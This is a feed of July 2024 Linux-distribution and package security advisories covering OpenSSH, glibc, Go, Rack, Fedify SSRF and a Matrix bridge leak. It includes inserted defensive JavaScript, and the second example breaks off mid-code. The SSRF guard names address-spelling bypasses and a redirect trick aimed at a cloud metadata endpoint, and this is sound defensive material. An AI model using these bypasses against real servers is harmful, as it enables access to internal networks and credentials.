03.07.2024 03:00:00oraclelinux[ELSA-2024-4231] python-jinja2 security update (moderate)[2.10.1-5]- Security fix for CVE-2024-34064 Resolves: RHEL-35651https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-4231
03.07.2024 03:00:00oraclelinux[ELSA-2024-4241] iperf3 security update (moderate)[3.5-10]- Resolves: RHEL-29578 - vulnerable to marvin attack if the authentication option is used [3.5-9]- Resolves: RHEL-17069 - possible denial of service [3.5-8]- Related: #2222205 - bumping nvr for correct update pathhttps://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-4241
03.07.2024 03:00:00oraclelinux[ELSA-2024-4242] libreoffice security update (moderate)[6.4.7.2-17.0.1]- Replace colors with Oracle colors [Orabug: 32120093]- Build with --with-vendor='Oracle America, Inc.'- Added the --with-hamcrest option to configure.[6.4.7.2]- Remove Red Hat branding- Change vendor to RESF[1:6.4.7.2-17]- Fix CVE-2024-3044 add notify for script usehttps://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-4242
03.07.2024 03:00:00oraclelinux[ELSA-2024-4245] python3 security update (moderate)[1.1.0-3]- Security fix for CVE-2024-36039 Resolves: RHEL-38366https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-4245
03.07.2024 03:00:00oraclelinux[ELSA-2024-4260] python-idna security update (moderate)[2.5-7]- Fix patch application for security fix for CVE-2024-3651 Resolves: RHEL-32703 [2.5-6]- Security fix for CVE-2024-3651 Resolves: RHEL-32703https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-4260
03.07.2024 03:00:00redhat[RHSA-2024:4312] openssh security update (important)OpenSSH is an SSH protocol implementation supported by a number of Linux, UNIX, and similar operating systems. It includes the core files necessary for both the OpenSSH client and server.Security Fix(es):* openssh: Possible remote code execution due to a race condition in signal handling (CVE-2024-6387)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:4312
03.07.2024 03:00:00oraclelinux[ELSA-2024-12472] glibc security update (important)[2.34-100.0.1.2]- Forward-port Oracle patches for ol9-u4 Reviewed by: Jose E. Marchesi <jose.marchesi@oracle.com> Oracle history: April-30-2024 Cupertino Miranda <cupertino.miranda@oracle.com> - 2.34-100.0.1 - Forward-port Oracle patches for ol9-u4 Reviewed by: Indu Bhagat <indu.bhagat@oracle.com> March-28-2024 Cupertino Miranda <cupertino.miranda@oracle.com> - 2.34-100.0.1 - Forward-port Oracle patches for ol9-u4-beta Reviewed by: Jose E. Marchesi <jose.marchesi@oracle.com> March 15 2024 Cupertino Miranda <cupertino.miranda@oracle.com> - 2.34-83.0.2.12 - Forward-port Oracle patches for ol9 Reviewed by: Jose E. Marchesi <jose.marchesi@oracle.com> February-26-2024 Cupertino Miranda <cupertino.miranda@oracle.com> - 2.34-83.0.2.7 - OraBug 36322437 getaddrinfo does not return correct ipv6 address and family Reviewed by: Jose E. Marchesi <jose.marchesi@oracle.com> October-24-2023 Cupertino Miranda <cupertino.miranda@oracle.com> - 2.34-83.0.1.7 - Forward-port Oracle patches for ol9 Reviewed by: Jose E. Marchesi <jose.marchesi@oracle.com> October-4-2023 Cupertino Miranda <cupertino.miranda@oracle.com> - 2.34-82.0.1 - Forward-port Oracle patches for ol9 Reviewed by: Jose E. Marchesi <jose.marchesi@oracle.com> April-18-2023 Cupertino Miranda <cupertino.miranda@oracle.com> - 2.34-60.0.2 - OraBug 35305078 Glibc tunable to disable huge pages on pthread_create stacks - Created tunable glibc.pthread.stack_hugetlb to control when hugepages can be used for stack allocation. - In case THP are enabled and glibc.pthread.stack_hugetlb is set to 0, glibc will madvise the kernel not to use allow hugepages for stack allocations. Reviewed by: Jose E. Marchesi <jose.marchesi@oracle.com> March-28-2023 Cupertino Miranda <cupertino.miranda@oracle.com> - 2.34-60.0.1 - Merge Oracle patches for ol9-u2 beta Reviewed by: Jose E. Marchesi <jose.marchesi@oracle.com> September-28-2022 Patrick McGehearty <patrick.mcgehearty@oracle.com> - 2.34-40.0.1 - Merge Oracle patches for ol9-u1 beta Reviewed by: Jose E. Marchesi <jose.marchesi@oracle.com> April-25-2022 Patrick McGehearty <patrick.mcgehearty@oracle.com> - 2.34-28.0.1 - Merge Oracle patches with ol9 beta - Reviewed-by: Jose E. Marchesi <jose.marchesi@oracle.com>[2.34-100.2]- CVE-2024-33599: nscd: buffer overflow in netgroup cache (RHEL-34318)- CVE-2024-33600: nscd: null pointer dereferences in netgroup cache- CVE-2024-33601: nscd: crash on out-of-memory condition- CVE-2024-33602: nscd: memory corruption with NSS netgroup modules[2.34-100.1]- CVE-2024-2961: Out of bounds write in iconv conversion to ISO-2022-CN-EXT (RHEL-32480)[2.34-100]- manual: fix order of arguments of memalign and aligned_alloc (RHEL-21556)[2.34-99]- getaddrinfo: Return correct error EAI_MEMORY when out-of-memory (RHEL-19444)[2.34-98]- getaddrinfo: Fix occasionally empty result due to nscd cache order (RHEL-16643)[2.34-97]- Re-enable output buffering for wide stdio streams (RHEL-19862)[2.34-96]- Fix TLS corruption during dlopen()/dlclose() sequences (RHEL-17465)[2.34-95]- Improve compatibility between underlinking and IFUNC resolvers (RHEL-17319)[2.34-94]- Update syscall-names.list for Linux 6.6. (RHEL-16016)[2.34-93]- malloc: Use __get_nprocs on arena_get2. (RHEL-17157)[2.34-92]- Improve test coverage for wcsdup, strdup and strndup. (RHEL-15343)[2.34-91]- fstat performance enhancement (RHEL-2338)[2.34-90]- ldconfig should skip temporary files created by RPM (RHEL-14383)[2.34-89]- Fix force-first handling in dlclose (RHEL-2491)[2.34-88]- nscd: Refer to /run instead of /var/run in systemd socket file (RHEL-16275)[2.34-87]- Fix slow tls access after dlopen (RHEL-2123)[2.34-86]- Add /usr/share/doc/glibc/gai.conf to glibc-doc (RHEL-14545)[2.34-85]- nscd: Skip unusable entries in first pass in prune_cache (RHEL-3397)[2.34-84]- x86-64: Report non-zero cache sizes under TDX hypervisors (RHEL-1191)[2.34-83.7]- Fix memory leak regression in getaddrinfo (RHEL-2426)[2.34-83.6]- CVE-2023-4911 glibc: buffer overflow in ld.so leading to privilege escalation (RHEL-3000)[2.34-83.5]- Revert: Always call destructors in reverse constructor order (RHEL-2491)[2.34-83.4]- CVE-2023-4806 glibc: potential use-after-free in getaddrinfo (RHEL-2426)[2.34-83.3]- CVE-2023-4813: potential use-after-free in gaih_inet (RHEL-2438)https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-12472
03.07.2024 03:00:00oraclelinux[ELSA-2024-4235] 389-ds security update (important)[1.4.3.39-7]- Bump version to 1.4.3.39-7- Resolves: RHEL-16277 - LDAP connections are closed with code T2 before the IO block timeout is reached. [rhel-8.10.0.z][1.4.3.39-6]- Bump version to 1.4.3.39-6- Resolves: RHEL-16277 - LDAP connections are closed with code T2 before the IO block timeout is reached. [rhel-8.10.0.z][1.4.3.39-5]- Bump version to 1.4.3.39-5- Resolves: RHEL-16277 - LDAP connections are closed with code T2 before the IO block timeout is reached. [rhel-8.10.0.z][1.4.3.39-4]- Bump version to 1.4.3.39-4- Resolves: RHEL-34818 - redhat-ds:11/389-ds-base: Malformed userPassword may cause crash at do_modify in slapd/modify.c- Resolves: RHEL-34824 - redhat-ds:11/389-ds-base: potential denial of service via specially crafted kerberos AS-REQ requesthttps://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-4235
03.07.2024 03:00:00oraclelinux[ELSA-2024-4237] go-toolset security update (moderate)delve[1.21.2-3.0.1]- Disable DWARF compression which has issues (Alex Burmashev)[1.21.2-3]- Skip an additional test as it's breaking in the CI system.- Modify the name of the patch.- Resolves: RHEL-22820[1.21.2-2]- Fix: Remove architectures from exclude ExcludeArch- Resolves: RHEL-22820[1.21.2-1]- Rebase to 1.21.2- Add support for ppc64le and aarch64- Enable the test suite- Modify ports: Some CI systems complain about the usage of the 8888 port.- Improve the way PPC64LE support is enabled.- Resolves: RHEL-22820golang[1.21.11-1]- Update to Go1.21.11 to address CVE-2024-24789 and CVE-2024-24790- Resolves: RHEL-40274[1.21.10]- Update to Go 1.21.10- Resolves: RHEL-36993go-toolset[1.21.11-1]- Rebase to Go1.21.11 that includes fixes for CVE-2024-24789 and CVE-2024-24790- Resolves: RHEL-40274[1.21.10-1]- Update to Go 1.21.10- Resolves: RHEL-36993https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-4237
03.07.2024 03:00:00oraclelinux[ELSA-2024-4246] container-tools security update (moderate)aardvark-dns[2:1.10.0-1]- update to https://github.com/containers/aardvark-dns/releases/tag/v1.10.0- Related: Jira:RHEL-2110[2:1.9.0-1]- update to https://github.com/containers/aardvark-dns/releases/tag/v1.9.0- Related: Jira:RHEL-2110[2:1.8.0-1]- update to https://github.com/containers/aardvark-dns/releases/tag/v1.8.0- Related: Jira:RHEL-2110 buildah[2:1.33.8-1]- update to the latest content of https://github.com/containers/buildah/tree/release-1.33 (https://github.com/containers/buildah/commit/b65a814)- Resolves: RHEL-40850 cockpit-podman conmon containernetworking-plugins containers-common container-selinux criu[3.18-5]- rebuild to preserve upgrade path- Related: RHEL-32671 crun fuse-overlayfs libslirp[4.4.0-2]- rebuild to preserve upgrade path 8.9 -> 8.10- Related: RHEL-32671 netavark oci-seccomp-bpf-hook podman[4.9.4-4.0.1]- Add devices on container startup, not on creation[4:4.9.4-4]- update to the latest content of https://github.com/containers/podman/tree/v4.9-rhel (https://github.com/containers/podman/commit/1a6dca2)- Resolves: RHEL-40851 python-podman runc skopeo[2:1.14.4-1]- update to the latest content of https://github.com/containers/skopeo/tree/release-1.14 (https://github.com/containers/skopeo/commit/78d9c9a)- Resolves: RHEL-40852 slirp4netns udica[0.2.6-21]- bump release to preserve update path- Resolves: RHEL-32671[0.2.6-20]- bump release to preserve update path- Related: #2139052https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-4246
03.07.2024 01:15:04alpinelinux[ALPINE:CVE-2024-24791] go vulnerability[From CVE-2024-24791] The net/http HTTP/1.1 client mishandled the case where a server responds to a request with an "Expect: 100-continue" header with a non-informational (200 or higher) status. This mishandling could leave a client connection in an invalid state, where the next request sent on the connection will fail. An attacker sending a request to a net/http/httputil.ReverseProxy proxy can exploit this mishandling to cause a denial of service by sending "Expect: 100-continue" requests which elicit a non-informational response from the backend. Each such request leaves the proxy with an invalid connection, and causes one subsequent request using that connection to fail.https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-24791
03.07.2024 16:48:10go[GO-2024-2567] Panic in Pipeline when PgConn is busy or closed in github.com/jackc/pgx Pipeline can panic when PgConn is busy or closed.https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2567
03.07.2024 18:15:20almalinux[ALSA-2024:4249] c-ares security update (low)c-ares security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:4249
03.07.2024 14:45:56almalinux[ALSA-2024:4252] nghttp2 security update (moderate)nghttp2 security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:4252
03.07.2024 14:41:24almalinux[ALSA-2024:4256] less security update (important)less security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:4256
03.07.2024 17:16:03almalinux[ALSA-2024:4259] xmlrpc-c security and bug fix update (moderate)xmlrpc-c security and bug fix updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:4259
03.07.2024 14:38:16almalinux[ALSA-2024:4260] python-idna security update (moderate)python-idna security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:4260
03.07.2024 14:33:34almalinux[ALSA-2024:4264] openldap security update (low)openldap security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:4264
03.07.2024 14:27:59almalinux[ALSA-2024:4265] cups security update (moderate)cups security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:4265
03.07.2024 17:21:11almalinux[ALSA-2024:4227] python-pillow security update (moderate)python-pillow security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:4227
03.07.2024 17:19:15almalinux[ALSA-2024:4231] python-jinja2 security update (moderate)python-jinja2 security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:4231
03.07.2024 15:24:12almalinux[ALSA-2024:4237] go-toolset security update (moderate)go-toolset security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:4237
03.07.2024 17:17:31almalinux[ALSA-2024:4241] iperf3 security update (moderate)iperf3 security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:4241
03.07.2024 15:16:48almalinux[ALSA-2024:4243] python3 security update (moderate)python3 security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:4243
03.07.2024 15:11:03almalinux[ALSA-2024:4244] python3.11-PyMySQL security update (moderate)python3.11-PyMySQL security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:4244
03.07.2024 15:05:43almalinux[ALSA-2024:4245] python3 security update (moderate)python3 security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:4245
03.07.2024 15:02:00almalinux[ALSA-2024:4246] container-tools security update (moderate)container-tools security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:4246
03.07.2024 14:49:51almalinux[ALSA-2024:4247] libuv security update (moderate)libuv security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:4247
03.07.2024 17:14:44almalinux[ALSA-2024:4267] fontforge security update (moderate)fontforge security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:4267
03.07.2024 17:13:47almalinux[ALSA-2024:4278] qemu-kvm security update (important)qemu-kvm security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:4278
03.07.2024 03:00:00freebsd[FREEBSD:B0374722-3912-11EF-A77E-901B0E9408DC] go -- net/http: denial of service due to improper 100-continue handlingThe Go project reports: net/http: denial of service due to improper 100-continue handling The net/http HTTP/1.1 client mishandled the case where a server responds to a request with an "Expect: 100-continue" header with a non-informational (200 or higher) status. This mishandling could leave a client connection in an invalid state, where the next request sent on the connection will fail. An attacker sending a request to a net/http/httputil.ReverseProxy proxy can exploit this mishandling to cause a denial of service by sending "Expect: 100-continue" requests which elicit a non-informational response from the backend. Each such request leaves the proxy with an invalid connection, and causes one subsequent request using that connection to fail.https://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:B0374722-3912-11EF-A77E-901B0E9408DC
04.07.2024 23:25:40ubuntu[USN-6879-1] Virtuoso Open-Source Edition vulnerabilities (high)Virtuoso Open-Source Edition could be made to crash if it received specially crafted input.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6879-1
04.07.2024 22:11:24ubuntu[USN-6866-2] Linux kernel (Azure) vulnerabilities (high)Several security issues were fixed in the Linux kernel.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6866-2
04.07.2024 20:50:51ubuntu[USN-6870-2] Linux kernel (AWS) vulnerabilities (medium)Several security issues were fixed in the Linux kernel.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6870-2
04.07.2024 19:56:28ubuntu[USN-6873-2] Linux kernel (StarFive) vulnerabilities (medium)Several security issues were fixed in the Linux kernel.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6873-2
04.07.2024 19:43:29ubuntu[USN-6864-2] Linux kernel vulnerabilities (medium)Several security issues were fixed in the Linux kernel.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6864-2
04.07.2024 19:35:24ubuntu[USN-6872-2] Linux kernel vulnerabilities (medium)Several security issues were fixed in the Linux kernel.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6872-2
04.07.2024 19:25:18ubuntu[USN-6876-1] Kopano Core vulnerabilities (critical)Several security issues were fixed in Kopano Core.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6876-1
04.07.2024 18:29:41ubuntu[USN-6878-1] Linux kernel (Oracle) vulnerabilities (critical)Several security issues were fixed in the Linux kernel.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6878-1
04.07.2024 16:18:59ubuntu[USN-6877-1] LibreOffice vulnerabilityLibreOffice could be made to expose sensitive information.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6877-1
04.07.2024 12:15:04alpinelinux[ALPINE:CVE-2024-39884] apache2 vulnerability[From CVE-2024-39884] A regression in the core of Apache HTTP Server 2.4.60 ignores some use of the legacy content-type based configuration of handlers. "AddType" and similar configuration, under some circumstances where files are requested indirectly, result in source code disclosure of local content. For example, PHP scripts may be served instead of interpreted. Users are recommended to upgrade to version 2.4.61, which fixes this issue.https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-39884
04.07.2024 05:24:01ubuntu[USN-6875-1] Linux kernel (Azure) vulnerabilities (medium)Several security issues were fixed in the Linux kernel.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6875-1
04.07.2024 05:21:18ubuntu[USN-6864-1] Linux kernel vulnerabilities (medium)Several security issues were fixed in the Linux kernel.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6864-1
04.07.2024 05:18:51ubuntu[USN-6863-1] Linux kernel vulnerability (medium)The system could be made to crash or run programs as an administrator.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6863-1
04.07.2024 05:00:38ubuntu[USN-6874-1] Linux kernel (Azure) vulnerabilities (medium)Several security issues were fixed in the Linux kernel.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6874-1
04.07.2024 04:58:30ubuntu[USN-6873-1] Linux kernel vulnerabilities (medium)Several security issues were fixed in the Linux kernel.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6873-1
04.07.2024 04:55:57ubuntu[USN-6872-1] Linux kernel vulnerabilities (medium)Several security issues were fixed in the Linux kernel.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6872-1
04.07.2024 04:32:14ubuntu[USN-6871-1] Linux kernel (HWE) vulnerabilities (critical)Several security issues were fixed in the Linux kernel.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6871-1
04.07.2024 04:25:51ubuntu[USN-6870-1] Linux kernel vulnerabilities (medium)Several security issues were fixed in the Linux kernel.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6870-1
04.07.2024 04:06:30ubuntu[USN-6869-1] Linux kernel vulnerabilities (medium)Several security issues were fixed in the Linux kernel.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6869-1
04.07.2024 03:00:00oraclelinux[ELSA-2024-4312] openssh security update (important)[8.7p1-38.0.2.1]- Update upstream references [Orabug: 36564626][8.7p1-38.1]- Possible remote code execution due to a race condition (CVE-2024-6387) Resolves: RHEL-45347https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-4312
04.07.2024 02:04:31ubuntu[USN-6868-1] Linux kernel vulnerabilitiesSeveral security issues were fixed in the Linux kernel.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6868-1
04.07.2024 00:40:16ubuntu[USN-6867-1] Linux kernel vulnerabilities (high)Several security issues were fixed in the Linux kernel.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6867-1
04.07.2024 18:29:42rubysec[RUBYSEC:RACK-2024-39316] Rack ReDoS Vulnerability in HTTP Accept Headers Parsing (medium)### Summary A Regular Expression Denial of Service (ReDoS) vulnerability exists in the `Rack::Request::Helpers` module when parsing HTTP Accept headers. This vulnerability can be exploited by an attacker sending specially crafted `Accept-Encoding` or `Accept-Language` headers, causing the server to spend excessive time processing the request and leading to a Denial of Service (DoS).### Details The fix for https://github.com/rack/rack/security/advisories/GHSA-54rr-7fvw-6x8f was not applied to the main branch and thus while the issue was fixed for the Rack v3.0 release series, it was not fixed in the v3.1 release series until v3.1.5.https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:RACK-2024-39316
04.07.2024 10:29:57almalinux[ALSA-2024:4235] 389-ds security update (important)389-ds security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:4235
04.07.2024 09:42:12almalinux[ALSA-2024:4242] libreoffice security update (moderate)libreoffice security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:4242
05.07.2024 23:07:55npm[NPM:GHSA-P9CG-VQCC-GRCX] Server Side Request Forgery (SSRF) attack in Fedify (high)### Summary At present, when Fedify needs to retrieve an object or activity from a remote activitypub server, it makes an HTTP request to the `@id` or other resources present within the activity it has received from the web. This activity could reference an `@id` that points to an internal IP address, allowing an attacker to send requests to resources internal to the fedify server's network. This applies to not just resolution of documents containing activities or objects, but also to media URLs as well. Specifically this is a [Server Side Request Forgery attack](https://owasp.org/www-community/attacks/Server_Side_Request_Forgery). You can learn more about SSRF attacks via [CWE-918](https://cwe.mitre.org/data/definitions/918.html)### Details When Fedify makes a request at runtime via the DocLoader [1] [2], the `fetch` API does not first check the URIs to assert that they resolve to a public IP address. Additionally, any downstream software of Fedify that may fetch data from URIs contained within Activities or Objects may be at risk of requesting non-public resources, and storing those, exposing non-public information to the public. Additionally, in many cases the URIs are not asserted to be either strictly HTTPS or HTTP protocols, which could lead to further attacks, and there is no check that the URI contains a `hostname` part. Whilst the [`fetch()` specification](https://fetch.spec.whatwg.org/) may provide some safety here, along with underlying fetch implementations, there is still potential for attacks through using `data:` URIs, or just attacking some other protocol entirely, e.g., FTP or CalDav.[1] https://github.com/dahlia/fedify/blob/main/runtime/docloader.ts#L141 [2] https://github.com/dahlia/fedify/blob/main/runtime/docloader.ts#L175 #### Deno-specific Attack Vectors In Deno specifically, the `fetch()` API allows [accessing local filesystem](https://docs.deno.com/deploy/api/runtime-fetch/), I'm not sure how Deno's [Permissions model](https://docs.deno.com/runtime/manual/runtime/permission_apis/) may prevent attacks utilising `file:` URIs. > Fetch also supports fetching from file URLs to retrieve static files. For more info on static files, see the [filesystem API documentation](https://docs.deno.com/deploy/api/runtime-fs).#### ActivityPub Security Considerations This is also noted in the ActivityPub spec in [Section B.3 Security Considerations](https://www.w3.org/TR/activitypub/#security-localhost), however, there it is more limited in scope.#### Other Implementations It may be acceptable to allow a server operator to allow access to given non-public IP addresses, for instance [in Mastodon](https://github.com/mastodon/mastodon/blob/092bb8a27af9ee87ff9ebabaf354477470ea3a94/app/lib/request.rb#L330) they allow requests to non-public IP addresses, i.e., localhost in development and those in the `ALLOWED_PRIVATE_ADDRESSES` environment variable.### PoC I'm not sure a PoC is necessary given this is a reasonably well known vulnerability vector.### Impact This impacts server operators, as resources that are internal to their network may find themselves being improperly accessed or potentially even attacked or exposed to the public.### Notes for resolution: When implementing public IP address validation, be careful of [CWE-1389](https://cwe.mitre.org/data/definitions/1389.html) and [CWE-1286](https://cwe.mitre.org/data/definitions/1286.html) both of which [recently](https://github.com/advisories/GHSA-78xj-cgh5-2h22) caused a CVE to be filed against the popular node.js `ip` package, although this package was not originally intended for security purposes.https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-P9CG-VQCC-GRCX
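The Fedify advisory above lists the checks an outbound fetch of an attacker-supplied URL needs: a scheme allow-list (no `file:`/`data:`), a mandatory hostname, and a public-address check that is not fooled by the alternative IPv4 spellings behind CWE-1389/CWE-1286. The block below is an added example of such a guard, written for this page; it is not Fedify's code, and `checkOutboundUrl`, `parseIPv4Strict`, `isPublicIPv4`, `isPublicIPv6` and the injected `resolve(hostname) -> string[]` resolver are names assumed here so the example runs offline against a constructed name table rather than real DNS.

```javascript
// Added example (not Fedify's code): SSRF guard for URLs taken from untrusted
// ActivityPub documents. `resolve(hostname)` is injected so this runs offline;
// in production wrap dns.lookup(host, { all: true }) and pass every address through.

const ALLOWED_PROTOCOLS = new Set(['http:', 'https:']);

// Strict dotted-quad parser. Rejects the spellings an inet_aton-style parser would
// accept ("0177.0.0.1", "0x7f.0.0.1", "127.1", "2130706433"): a lax regex sees a
// "hostname", the socket layer sees 127.0.0.1 (the CWE-1389 / CWE-1286 trap).
function parseIPv4Strict(s) {
  const m = /^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$/.exec(s);
  if (!m) return null;
  const parts = m.slice(1);
  if (parts.some((p) => p.length > 1 && p[0] === '0')) return null; // no leading zeros
  const octets = parts.map(Number);
  return octets.every((o) => o <= 255) ? octets : null;
}

// Non-public IPv4: "this network", RFC 1918, loopback, link-local (which covers the
// 169.254.169.254 cloud metadata endpoint), CGNAT, multicast and reserved.
function isPublicIPv4([a, b]) {
  if (a === 0 || a === 10 || a === 127) return false;
  if (a === 169 && b === 254) return false;
  if (a === 172 && b >= 16 && b <= 31) return false;
  if (a === 192 && b === 168) return false;
  if (a === 100 && b >= 64 && b <= 127) return false;
  if (a >= 224) return false;
  return true;
}

// IPv6 classification for the compressed, lower-case forms a URL parser or resolver
// hands back. IPv4-mapped addresses are judged by the embedded IPv4.
function isPublicIPv6(s) {
  const ip = s.toLowerCase();
  const mappedDotted = /^::ffff:(\d+\.\d+\.\d+\.\d+)$/.exec(ip);
  if (mappedDotted) {
    const v4 = parseIPv4Strict(mappedDotted[1]);
    return v4 !== null && isPublicIPv4(v4);
  }
  const mappedHex = /^::ffff:([0-9a-f]{1,4}):([0-9a-f]{1,4})$/.exec(ip);
  if (mappedHex) {
    const hi = parseInt(mappedHex[1], 16);
    const lo = parseInt(mappedHex[2], 16);
    return isPublicIPv4([hi >> 8, hi & 255, lo >> 8, lo & 255]);
  }
  if (ip === '::1' || ip === '::') return false;      // loopback, unspecified
  if (/^f[cd][0-9a-f]{2}:/.test(ip)) return false;    // fc00::/7 unique local
  if (/^fe[89ab][0-9a-f]:/.test(ip)) return false;    // fe80::/10 link-local
  if (/^ff[0-9a-f]{2}:/.test(ip)) return false;       // multicast
  return true;
}

// Returns { ok: true, host, addrs } or { ok: false, reason }.
function checkOutboundUrl(urlString, resolve) {
  let url;
  try {
    url = new URL(urlString);
  } catch {
    return { ok: false, reason: 'unparseable URL' };
  }
  // Scheme allow-list: blocks file:, data:, ftp: and whatever else fetch() may support.
  if (!ALLOWED_PROTOCOLS.has(url.protocol)) {
    return { ok: false, reason: `scheme ${url.protocol} not allowed` };
  }
  let host = url.hostname;
  if (host === '') return { ok: false, reason: 'missing hostname' };
  if (host.startsWith('[') && host.endsWith(']')) host = host.slice(1, -1); // IPv6 literal

  // Literals are checked directly; names go through the resolver, and EVERY returned
  // address must be public (an attacker-controlled name can mix public and private records).
  const addrs = parseIPv4Strict(host) || host.includes(':') ? [host] : resolve(host);
  if (!addrs || addrs.length === 0) return { ok: false, reason: 'host did not resolve' };

  for (const a of addrs) {
    const v4 = parseIPv4Strict(a);
    const pub = v4 ? isPublicIPv4(v4) : a.includes(':') ? isPublicIPv6(a) : false;
    if (!pub) return { ok: false, reason: `${a} is not a public address` };
  }
  // Hand back the vetted addresses so the caller can pin the connection to one of them;
  // re-resolving at connect time would reopen the DNS-rebinding window.
  return { ok: true, host, addrs };
}
```

Two caveats the advisory's "Notes for resolution" point at: the check has to be repeated on every redirect target (a public host can 302 to `http://169.254.169.254/`), and a browser-style `fetch()` cannot connect to a pre-vetted IP, so a complete fix either uses an HTTP client that accepts a custom lookup/agent or, as Mastodon does, keeps an explicit operator allow-list for the private addresses that are intentionally reachable.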
06.07.2024 00:37:32npm[NPM:GHSA-W9MH-5X8J-9754] Malicious Matrix homeserver can leak truncated message content of messages it shouldn't have access to (moderate)### Impact The fix for GHSA-wm4w-7h2q-3pf7 / [CVE-2024-32000](https://www.cve.org/CVERecord?id=CVE-2024-32000) included in matrix-appservice-irc 2.0.0 relied on the Matrix homeserver-provided timestamp to determine whether a user has access to the event they're replying to when determining whether or not to include a truncated version of the original event in the IRC message. Since this value is controlled by external entities, a malicious Matrix homeserver joined to a room in which a matrix-appservice-irc bridge instance (before version 2.0.1) is present can fabricate the timestamp with the intent of tricking the bridge into leaking room messages the homeserver should not have access to.### Patches matrix-appservice-irc 2.0.1 [drops the reliance](https://github.com/matrix-org/matrix-appservice-irc/pull/1804) on `origin_server_ts` when determining whether or not an event should be visible to a user, instead tracking the event timestamps internally.### Workarounds It's possible to limit the amount of information leaked by setting a reply template that doesn't contain the original message. See [these lines](https://github.com/matrix-org/matrix-appservice-irc/blob/d5d67d1d3ea3f0f6962a0af2cc57b56af3ad2129/config.sample.yaml#L601-L604) in the configuration file.### References - Patch: https://github.com/matrix-org/matrix-appservice-irc/pull/1804 ### For more information If you have any questions or comments about this advisory, please email us at [security at matrix.org](mailto:security@matrix.org).https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-W9MH-5X8J-9754
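The matrix-appservice-irc advisory above turns on one point: `origin_server_ts` is written by whichever homeserver originated the event, so an authorization decision that orders events by it is ordering them by an attacker's claim. The block below is an added example for this page, not the bridge's code; it models the decision as "the replying user's membership must predate the original message" (an assumption made here, the advisory does not spell the rule out) and shows the vulnerable ordering by server-supplied timestamp next to the fixed ordering by the bridge's own receipt time. `ReplyGate` and the event shapes are constructed for the example.

```javascript
// Added example (not matrix-appservice-irc's code). Decides whether a reply bridged to
// IRC may quote the original Matrix message. `now` is injectable for determinism.
class ReplyGate {
  constructor(now = () => Date.now()) {
    this.now = now;
    this.seenAt = new Map(); // event_id -> bridge-local receipt time (ms)
  }

  // Record every event as it arrives. The stored time is ours; nothing in the
  // payload can move it, and a re-delivered event keeps its first timestamp.
  observe(event) {
    if (!this.seenAt.has(event.event_id)) this.seenAt.set(event.event_id, this.now());
  }

  // Vulnerable ordering: trusts each sender's claim about when its event happened.
  // A malicious homeserver backdates its user's join so it "precedes" any message.
  mayQuoteTrustingServerTs(original, membership) {
    return membership.origin_server_ts <= original.origin_server_ts;
  }

  // Fixed ordering: a join the bridge first saw after the message cannot have
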